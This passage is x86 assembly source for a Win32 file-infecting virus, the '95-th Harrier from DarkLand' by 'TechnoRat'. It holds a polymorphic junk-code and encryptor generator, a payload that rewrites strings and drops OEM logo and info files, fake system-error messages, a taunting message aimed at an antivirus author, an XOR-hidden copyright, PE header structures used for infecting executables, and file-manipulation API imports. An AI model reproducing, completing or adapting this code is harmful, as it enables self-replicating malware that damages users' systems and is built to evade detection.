GenNoFlag_5_1$:	Pop	ECx
		Pop	EAx
		Or	Al,8h
		StosB
		Ret

GenNoFlag_6$:	Dec	EAx
		Jnz	GenNoFlag_7$		; ">6"
		Mov	Al,10h			; Jcc $+2
		Call	Random
		Or	Al,70h
		StosB
		Xor	Al,Al
		StosB
		Ret

GenNoFlag_7$:	Dec	EAx
		Jnz	GenNoFlag_8$		; ">7"
		Mov	Al,0EBh			; Jmps $+?
		StosB
		Mov	Al,20h			; Jmp distance. . .
		Call	Random
		StosB
		Push	ECx
		Mov	ECx,EAx
		Or	ECx,ECx
		Jz	GenNoFlag_7_1$
GenNoFlag_7_2$:	Mov	EAx,100h
		Call	Random
		StosB
		Dec	ECx
		Jnz	GenNoFlag_7_2$
GenNoFlag_7_1$:	Pop	ECx
		Ret

GenNoFlag_8$:	Dec	EAx
		Jnz	GenNoFlag_9$		; ">8"
		Mov	Al,60h			; PushA / PopA
		StosB
		Push	ECx			; Some seria of commands
		Mov	EAx,5h			; How many. . .
		Call	Random
		Mov	ECx,EAx
		Or	ECx,ECx
		Jz	GenNoFlag_8_1$
GenNoFlag_8_2$:	Call	GenNoFlagCom
		Dec	ECx
		Jnz	GenNoFlag_8_2$
GenNoFlag_8_1$:	Pop	ECx
		Mov	Al,61h
		StosB
		Ret

GenNoFlag_9$:	Mov	Al,9Ch			; PushF / PopF
		StosB
		Push	ECx			; Some seria of commands
		Mov	EAx,5h			; How many. . .
		Call	Random
		Mov	ECx,EAx
		Or	ECx,ECx
		Jz	GenNoFlag_9_1$
GenNoFlag_9_2$:	Call	GenNoFlagCom
		Dec	ECx
		Jnz	GenNoFlag_9_2$
GenNoFlag_9_1$:	Pop	ECx
		Mov	Al,9Dh
		StosB
		Ret

; ---------------------------------------------------------
GetNoEqRegs0:	Call	GetNoESpReg		; Get Registers Mod R/M
		Push	EBx			; byte with any NoEq
		Mov	Bl,Al			; registers inside
		Call	GetNoESpReg		; this pack (without ESp)
		Shl	Al,3h
		Or	Al,Bl
		Or	Al,0C0h
		Pop	EBx
		Ret

GetNoEqRegs:	Call	GetReg			; Get Registers Mod R/M
		Push	EBx			; byte with any NoEq
		Mov	Bl,Al			; registers inside
		Call	GetReg			; this pack
		Shl	Al,3h
		Or	Al,Bl
		Or	Al,0C0h
		Pop	EBx
		Ret

GetEqRegs:	Call	GetReg			; Get Registers Mod R/M
		Mov	Ah,Al			; byte with any Eq registers
		Shl	Al,3h			; inside this pack
		Or	Al,Ah
		Or	Al,0C0h
		Ret

GetNoESpReg:	Call	GetReg			; Get register number
		Cmp	Al,4h			; but without ESP
		Je	GetNoESPReg
		Ret

GetReg:		Mov	EAx,8h			; Get register number
		Call	Random
		Ret

; ---------------------------------------------------------
Enumer:		Push	EAx			; Enumerates the some
		Push	ECx			; procedure in EBx
		Mov	EAx,ECx			; ECx times with
		Call	Random			; parameters in EAx
		Or	ECx,ECx
		Jz	Enumer_0$
Enumer_1$:	Mov	EAx,[ESp][4]
		Call	EBx
		Dec	ECx
		Jnz	Enumer_1$
Enumer_0$:	Pop	ECx
		Pop	EAx
		Ret

; ---------------------------------------------------------
StoreByte:	Cmp	Byte Ptr pEnableEncr,0h	; Stores the Byte data
		Je	StoreByte_0$		; into encryptor buffer
		Mov	[ESi],Al
		Inc	ESi
StoreByte_0$:	Ret

StoreWord:	Cmp	Byte Ptr pEnableEncr,0h	; Stores the Word data
		Je	StoreWord_0$		; into encryptor buffer
		Mov	[ESi],Ax
		Add	ESi,2h
StoreWord_0$:	Ret

StoreDWord:	Cmp	Byte Ptr pEnableEncr,0h	; Stores the DWord data
		Je	StoreDWord_0$		; into encryptor buffer
		Mov	[ESi],EAx
		Add	ESi,4h
StoreDWord_0$:	Ret

; ---------------------------------------------------------
Random:		Push	EDx			; Generate some random number
		Push	ECx			; to EAx by border in EAx
		Push	EAx			; (0..Border-1)
		Mov	EAx,RandSeed		; Don't corrupt registers
		Mov	ECx,8088405h		; [from TurboPascal v7.0]
		Mul	ECx			; (Based on Congruent
		Inc	EAx			; generating algorythm)
		Mov	RandSeed,EAx
		Pop	ECx
		Mul	ECx
		Pop	ECx
		Mov	EAx,EDx
		Pop	EDx
		Ret

;Separator=_Nop
; ---------------------------------------------------------
; Data for convertor
;DefCodeLine
ConvertDataLen	=	4h
ConvertData	Label	DWord
		Dd	Offset SearchStr1
		Dd	Offset ReplaceStr1

		Dd	Offset SearchStr2
		Dd	Offset ReplaceStr2

		Dd	Offset SearchStr3
		Dd	Offset ReplaceStr3

		Dd	Offset SearchStr4
		Dd	Offset ReplaceStr4
;BreakCodeLine

SearchStr1	Db	'MICROSOFT',0
SearchStr2	Db	'WINDOWS',0
SearchStr3	Db	'BILL GATES',0
SearchStr4	Db	'HARRIER',0

ReplaceStr1	Db	'MIcrOSOFT',0
ReplaceStr2	Db	'WINDOwS',0
ReplaceStr3	Db	'Gill Bates',0
ReplaceStr4	Db	'Oh! Guys! Is it about me?',0

; ---------------------------------------------------------
;DefCodeLine
InfoName	Db	'OEMINFO.INI',0h
InfoNameL	=	$-InfoName
;BreakCodeLine
;DefCodeLine
BitMapName	Db	'OEMLOGO.BMP',0h
BitMapNameL	=	$-BitMapName
;BreakCodeLine

SelfSectionName	Db	'.TEXT',0,0,0

InfSelfHeader	Db	'"95-th Harrier from DarkLand"',0
InfEnterDebug	Db	'Entering to DEBUG mode.',0
InfCancelMsg	Db	'Infecting aborted by Creator!',0
InfNoNameMsg	Db	'Name not specified.',0

;DefCodeLine
HelloMsg	Label	Byte
Db 'Oops, World, it is Me!',Cr
Db 'Can You image it? I am the Win32 platform based virus!',Cr
Db 'Hey, Daniloff! Will You porte Your DrWeb at this platform?',Cr
Db 'Hmm, Guy, what You think about Watcom C++ ?',Cr
Db Cr
Db 'Greetings goes to Gill Bates and to her Mircosoft Windoze 95 sucks,',Cr
Db '           and to rest lame part of world.',Cr
Db Cr
Db 'Ugly Lamers MUST DIE!',Cr
Db Cr
Db 'Who am I ?   I am the "95-th Harrier from DarkLand" !!!',Cr
Db 'I come from dark, I invade Your PC and now I will invade Your mind. . .',Cr
Db Cr
Db '                                                              TechnoRat',Cr
Db Cr
Db Ver,Release,BasedOn,Cr
Db 0
;BreakCodeLine

InfGodHelp	Db	'God will help! ;-)',0

; ---------------------------------------------------------
;DefCodeLine
FuckMsgCounter	=	6h
FuckMessages	Label	DWord
		Dd	FuckMsg1,FuckMsg2,FuckMsg3,FuckMsg4,FuckMsg5,FuckMsg6
;BreakCodeLine

FuckMsg1	Db	'System malfunction!',0
FuckMsg2	Db	'VXDs rings overcrossed!',0
FuckMsg3	Db	'CPU mode thunking error!',0
FuckMsg4	Db	'CPU overclocked, cooler device emergency!',0
FuckMsg5	Db	'Help subsystem is damaged!',0
FuckMsg6	Db	'Attention! Bugs inside computer, use SoftIce.',0

; ---------------------------------------------------------
; Here will be placed the very nice files. . .
		BFile	BitMapFile,HarrLogo.Bmp,HarrBtMpFile_Sz
		BFile	InfoFile,HarrInfo.Ini,HarrInfoFile_Sz

MemBase		Dd	?			; Program base in memory
HostIP		Dd	?			; for returning to host
Here		Dd	?			; self place in RAM
Debug		Dd	0h			; debugging flag
HelpCounter	Dd	0h			; for FuckingHelp ;-)
InitOk		Dd	1h			; Initialize semaphore:
						; 0 - process performing
						; 1 - must be initialized
						; 2 - initialized Ok.

; ---------------------------------------------------------
; Real copyright by creator.
;DefCodeLine
		Irpc	Char,<(C)reated by TechnoRat (hacker)>
		Db	'&Char' Xor 0FFh
		EndM
;BreakCodeLine

; ---------------------------------------------------------
RandSeed	Dd	?
StubEntryLabel	Dd	?
ImagePlace	Dd	?
CurrentPlace	Dd	?
PolyMorphSz	Dd	0h			; The size of decriptors
StubImportPlace	Dd	?
ImportPlace	Dd	?
ImportLength	Dd	?
BufferPlace	Dd	?

; ---------------------------------------------------------
; The Virtual stack variables
		Var	DosHeader	,40h	; Dos Header place
		Var	FileHandle	,DWord	; Generic file variables
		Var	FileAttributes	,DWord
		Var	FileNamePtr	,DWord
		Var	FileLastWrite	,8h	; Generic file Date/Time
		Var	FileLastAccess	,8h
		Var	FileCreation	,8h
		Var	ProcessedBytes	,DWord
		Var	NewSeconds	,Word
		Var	PackedTime	,8h
		Var	SomePath	,MaxPathLen

		Var	PEFileHeaders	,DWord

		Var	ImportLegal	,DWord	; Import section parameters
		Var	ImportPhysOffs	,DWord
		Var	ImportRVA	,DWord
		Var	ImportFlags	,DWord
		Var	ImportOrder	,DWord

;DefCodeLine
		Var	FT_Struc	,0h	; System Time description
		Var	FT_Year		,Word
		Var	FT_Month	,Word
		Var	FT_DayOfWeek	,Word
		Var	FT_Day		,Word
		Var	FT_Hour		,Word
		Var	FT_Minute	,Word
		Var	FT_Second	,Word
		Var	FT_Milliseconds	,Word
;BreakCodeLine

		Var	pBaseReg	,Byte	; PolyMorph gen. vars
		Var	pSemReg		,Byte
		Var	pEnableEncr	,Byte
		Var	pBase		,DWord
		Var	pSem		,DWord
		Var	pXchg		,DWord
		Var	pMov		,DWord
		Var	pBaseAdd	,DWord
		Var	pBaseSub	,DWord
		Var	pAgain		,DWord
		Var	pAgain_E	,DWord
		Var	pAdd		,DWord

		Var	GenSz		,DWord	; PolyMorph link vars
		Var	GenCrSz		,DWord
		Var	GenTotalSz	,DWord
		Var	Cryptors	,2*4*16
		Var	CryptCnt	,DWord

;DefCodeLine
		Var	Section		,0h
SectBegin	=	_VarAddr		; Section header description
		Var	SectName	,8h
		Var	SectVirtSize	,DWord
		Var	SectRVA		,DWord
		Var	SectPhysSize	,DWord
		Var	SectPhysOffs	,DWord
		Var	SectR		,3*4h
		Var	SectFlags	,DWord
SectSize	=	_VarAddr-SectBegin
;BreakCodeLine

;DefCodeLine
		Var	SelfSection	,0h
SelfSectBegin	=	_VarAddr		; Self section description
		Var	SelfSectName	,8h
		Var	SelfSectVirtSize,DWord
		Var	SelfSectRVA	,DWord
		Var	SelfSectPhysSize,DWord
		Var	SelfSectPhysOffs,DWord
		Var	SelfSectR	,3*4h
		Var	SelfSectFlags	,DWord
SelfSectSize	=	_VarAddr-SelfSectBegin
;BreakCodeLine

;DefCodeLine
		Var	PEHeader	,0h
PEHeaderBegin	=	_VarAddr		; PE Header description
		Var	PE_Sign		,DWord
		Var	PE_CPUType	,Word
		Var	PE_NumOfSections,Word
		Var	PE_TimeDate	,DWord
		Var	PE_PtrToCOFFTbl	,DWord
		Var	PE_COFFTblSize	,DWord
		Var	PE_NTHdrSize	,Word
		Var	PE_Flags	,Word
		Var	PE_Magic	,Word
		Var	PE_LMajor	,Byte
		Var	PE_LMinor	,Byte
		Var	PE_SizeOfCode	,DWord
		Var	PE_SizeOfIData	,DWord
		Var	PE_SizeOfUIData	,DWord
		Var	PE_EntryPointRVA,DWord
		Var	PE_BaseOfCode	,DWord
		Var	PE_BaseOfData	,DWord
		Var	PE_ImageBase	,DWord
		Var	PE_ObjectAlign	,DWord
		Var	PE_FileAlign	,DWord
		Var	PE_OsMajor	,Word
		Var	PE_OsMinor	,Word
		Var	PE_UserMajor	,Word
		Var	PE_UserMinor	,Word
		Var	PE_SubSysMajor	,Word
		Var	PE_SubSysMinor	,Word
		Var	PE_R1		,DWord
		Var	PE_ImageSize	,DWord
		Var	PE_HeaderSize	,DWord
		Var	PE_FileChkSum	,DWord
		Var	PE_SubSystem	,Word
		Var	PE_DllFlags	,Word
		Var	PE_StackReserveSz,DWord
		Var	PE_StackCommitSz,DWord
		Var	PE_HeapReserveSz,DWord
		Var	PE_HeapCommitSz	,DWord
		Var	PE_LoaderFlags	,DWord
		Var	PE_NumOfRVAAndSz,DWord
		Var	PE_ExportTableRVA,DWord
		Var	PE_ExportDataSz	,DWord
		Var	PE_ImportTableRVA,DWord
		Var	PE_ImportDataSz	,DWord
		Var	PE_RsrcTableRVA	,DWord
		Var	PE_RsrcDataSz	,DWord
		Var	PE_ExceptTableRVA,DWord
		Var	PE_ExceptDataSz	,DWord
		Var	PE_SecurTableRVA,DWord
		Var	PE_SecurDataSz	,DWord
		Var	PE_FixUpTableRVA,DWord
		Var	PE_FixUpDataSz	,DWord
		Var	PE_DebugTableRVA,DWord
		Var	PE_DebugDataSz	,DWord
		Var	PE_ImageDescrRVA,DWord
		Var	PE_DescriptionSz,DWord
		Var	PE_MachineSpecRVA,DWord
		Var	PE_MachineSpecSz,DWord
		Var	PE_TLSRVA	,DWord
		Var	PE_TLSSz	,DWord
		Var	PE_R0		,30h
PEHeaderSize	=	_VarAddr-PEHeaderBegin

		If	PEHeaderSize NE 0F8h
		.Err	'PEHeader described incorrectly!'
		EndIf
;BreakCodeLine
;StopCode
		Var	VeryLargeBuffer	,0h	; Rest of memory ;-)

; ---------------------------------------------------------
_VarAddr	=	0h
		Var	ConvertVar	,4*4	; Tiny Stack variables
		Var	SmallBuffer	,0h	; (memory buffer)

; ---------------------------------------------------------
;StartData
		Extern	MessageBoxA:Proc	; External functions
		Extern	CreateFileA:Proc	; which imported
		Extern	SetFilePointer:Proc	; form some system
		Extern	CloseHandle:Proc	; DLL's (providers
		Extern	ReadFile:Proc		; of this functions)
		Extern	WriteFile:Proc
		Extern	SetFilePointer:Proc
		Extern	GetFileAttributesA:Proc
		Extern	SetFileAttributesA:Proc
		Extern	GetFileTime:Proc
		Extern	SetFileTime:Proc
		Extern	CopyFileA:Proc
		Extern	MoveFileA:Proc
		Extern	GetEnvironmentStringsA:Proc
		Extern	MessageBeep:Proc
		Extern	FileTimeToSystemTime:Proc
		Extern	SystemTimeToFileTime:Proc
		Extern	GetSystemTime:Proc
		Extern	GetSystemDirectoryA:Proc
;StopData

; ---------------------------------------------------------
		End	Start

; *==================================================================*
; !                     T I M E   T O   D I E                        !
; *==================================================================*